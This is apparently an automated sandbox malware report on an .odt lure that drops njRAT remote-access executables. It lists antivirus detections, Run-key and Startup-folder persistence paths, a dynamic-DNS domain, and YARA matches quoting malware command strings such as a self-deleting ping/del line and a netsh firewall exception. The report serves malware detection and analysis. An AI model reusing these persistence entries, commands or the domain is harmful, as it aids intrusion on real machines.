19:55:53	API Interceptor	1499x Sleep call for process: mshta.exe modified
19:56:01	API Interceptor	37x Sleep call for process: powershell.exe modified
19:56:15	API Interceptor	2x Sleep call for process: exploit.exe modified
19:56:24	API Interceptor	5x Sleep call for process: netsh.exe modified
19:56:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b "C:\Users\user\AppData\Local\Temp\dllhost.exe" ..
19:56:34	Autostart	Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run bde52a20d668d6f304b9db902c7cfc6b "C:\Users\user\AppData\Local\Temp\dllhost.exe" ..
19:56:42	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
AutoformLiscence bls activation.odt	29%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\exploit.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\dllhost.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	100%	Avira	TR/Dropper.Gen7
C:\Users\user\AppData\Local\Temp\exploit.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\dllhost.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
16.0.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
10.2.exploit.exe.1d0000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
11.0.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
15.0.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
11.2.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
10.0.exploit.exe.1d0000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
15.2.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File
16.2.dllhost.exe.210000.0.unpack	100%	Avira	TR/Dropper.Gen7	Download File

Domains

Source	Detection	Scanner	Label	Link
amibas8722.ddns.net	6%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.%s.comPA	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	Google Safe Browsing	safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\exploit.exe	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Local\Temp\exploit.exe	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Local\Temp\exploit.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bde52a20d668d6f304b9db902c7cfc6b.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
C:\Users\user\AppData\Local\Temp\dllhost.exe	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
C:\Users\user\AppData\Local\Temp\dllhost.exe	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
C:\Users\user\AppData\Local\Temp\dllhost.exe	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000000.515356796.001D2000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
00000009.00000002.520219680.023FF000.00000004.00000001.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x11172:$reg: SEE_MASK_NOZONECHECKS 0x162c1:$reg: SEE_MASK_NOZONECHECKS 0x1124a:$msg: Execute ERROR 0x112a6:$msg: Execute ERROR 0x16399:$msg: Execute ERROR 0x163f5:$msg: Execute ERROR 0x11134:$ping: cmd.exe /c ping 0 -n 2 & del 0x16283:$ping: cmd.exe /c ping 0 -n 2 & del
00000009.00000002.520219680.023FF000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x111a2:$a1: netsh firewall add allowedprogram 0x162f1:$a1: netsh firewall add allowedprogram 0x11172:$a2: SEE_MASK_NOZONECHECKS 0x162c1:$a2: SEE_MASK_NOZONECHECKS 0x1141c:$b1: [TAP] 0x1656b:$b1: [TAP] 0x11134:$c3: cmd.exe /c ping 0x16283:$c3: cmd.exe /c ping
0000000A.00000002.535195631.01905000.00000004.00000001.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x1068:$reg: SEE_MASK_NOZONECHECKS 0x711c:$reg: SEE_MASK_NOZONECHECKS 0x71f4:$msg: Execute ERROR 0x7250:$msg: Execute ERROR 0x70de:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000002.535195631.01905000.00000004.00000001.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x10b8:$a1: netsh firewall add allowedprogram 0x714c:$a1: netsh firewall add allowedprogram 0x1068:$a2: SEE_MASK_NOZONECHECKS 0x711c:$a2: SEE_MASK_NOZONECHECKS 0x73c6:$b1: [TAP] 0x70de:$c3: cmd.exe /c ping
0000000F.00000000.586989058.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000F.00000000.586989058.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
00000010.00000002.610854599.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
00000010.00000002.610854599.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
0000000F.00000002.600191296.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000F.00000002.600191296.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
0000000B.00000000.533213752.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000B.00000000.533213752.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
00000010.00000000.597361125.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
00000010.00000000.597361125.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
0000000B.00000002.756194496.00212000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000B.00000002.756194496.00212000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping
0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4b6c:$reg: SEE_MASK_NOZONECHECKS 0x4c44:$msg: Execute ERROR 0x4ca0:$msg: Execute ERROR 0x4b2e:$ping: cmd.exe /c ping 0 -n 2 & del
0000000A.00000002.533586619.001D2000.00000020.00020000.sdmp	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4b9c:$a1: netsh firewall add allowedprogram 0x4b6c:$a2: SEE_MASK_NOZONECHECKS 0x4e16:$b1: [TAP] 0x4b2e:$c3: cmd.exe /c ping

Unpacked PEs

Source	Rule	Description	Author	Strings
11.0.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
10.2.exploit.exe.1d0000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
11.0.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
10.2.exploit.exe.1d0000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
11.0.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
10.2.exploit.exe.1d0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
16.0.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
16.0.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
16.0.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
15.0.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
15.0.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
15.0.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
11.2.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
11.2.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
11.2.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
10.0.exploit.exe.1d0000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
10.0.exploit.exe.1d0000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
10.0.exploit.exe.1d0000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
16.2.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
16.2.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
16.2.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping
15.2.dllhost.exe.210000.0.unpack	CN_disclosed_20180208_c_RID2E71	Detects malware from disclosed CN malware set	Florian Roth	0x4d2e:$x1: cmd.exe /c ping 0 -n 2 & del " 0x4e86:$s3: Executed As 0x4e68:$s6: Download ERROR
15.2.dllhost.exe.210000.0.unpack	Njrat	detect njRAT in memory	JPCERT/CC Incident Response Group	0x4d6c:$reg: SEE_MASK_NOZONECHECKS 0x4e44:$msg: Execute ERROR 0x4ea0:$msg: Execute ERROR 0x4d2e:$ping: cmd.exe /c ping 0 -n 2 & del
15.2.dllhost.exe.210000.0.unpack	njrat1	Identify njRat	Brian Wallace @botnet_hunter	0x4d9c:$a1: netsh firewall add allowedprogram 0x4d6c:$a2: SEE_MASK_NOZONECHECKS 0x5016:$b1: [TAP] 0x4d2e:$c3: cmd.exe /c ping

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
a.top4top.net	Info.doc	Get hash	malicious	Browse	51.15.9.13

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
unknown	Invoice0186.pdf	Get hash	malicious	Browse	192.168.0.40
	P_2038402.xlsx	Get hash	malicious	Browse	192.168.0.44
	bad.pdf	Get hash	malicious	Browse	192.168.0.44
	RFQ.pdf	Get hash	malicious	Browse	192.168.0.44
	100323.pdf	Get hash	malicious	Browse	192.168.0.44
	Copy.pdf	Get hash	malicious	Browse	127.0.0.1
	2.exe	Get hash	malicious	Browse	192.168.0.40
	UPPB502981.doc	Get hash	malicious	Browse	192.168.0.44
	Adm_Boleto.via2.com	Get hash	malicious	Browse	192.168.0.40
	00ECF4AD.exe	Get hash	malicious	Browse	192.168.0.40
	PDF_100987464500.exe	Get hash	malicious	Browse	192.168.0.40
	filedata.exe	Get hash	malicious	Browse	192.168.0.40
	.exe	Get hash	malicious	Browse	192.168.1.60
	33redacted@threatwave.com	Get hash	malicious	Browse	192.168.1.71

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	Your_Purchase_4396143.xls	Get hash	malicious	Browse	163.172.46.38
	Bofa_Charge01312019.xlsm	Get hash	malicious	Browse	163.172.46.38
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	163.172.46.38
	C_ACH_02042019.xlsm	Get hash	malicious	Browse	163.172.46.38
	14308278291.xlsm	Get hash	malicious	Browse	163.172.46.38
	FILEY595000383.doc	Get hash	malicious	Browse	163.172.46.38
	FILEY595000383.doc	Get hash	malicious	Browse	163.172.46.38
	PO53473.doc	Get hash	malicious	Browse	163.172.46.38
	Facture_Num_OFH30703.doc	Get hash	malicious	Browse	163.172.46.38
	DOK97159672110.doc	Get hash	malicious	Browse	163.172.46.38
	vXZa4D4m4V.xls	Get hash	malicious	Browse	163.172.46.38
	Prepared_Purchase_Info_429458.doc	Get hash	malicious	Browse	163.172.46.38
	1704007#U682a#U5f0f#U4f1a#U793e04082.xls	Get hash	malicious	Browse	163.172.46.38
	62918504564317 .xls	Get hash	malicious	Browse	163.172.46.38
	571275114140SS .xls	Get hash	malicious	Browse	163.172.46.38
	Documento.FT.60803.modifiche_societarie.xls	Get hash	malicious	Browse	163.172.46.38
	Documento_081507_FT_20190415_0006009_.xls	Get hash	malicious	Browse	163.172.46.38
	Documento_057496_FT_20190415_0005008_.xls	Get hash	malicious	Browse	163.172.46.38
	Scanmalta Client Invoice Statements.xls	Get hash	malicious	Browse	163.172.46.38
	fee-docs.doc	Get hash	malicious	Browse	163.172.46.38

Dropped Files

No context

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report AutoformLiscence bls activation.odt

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails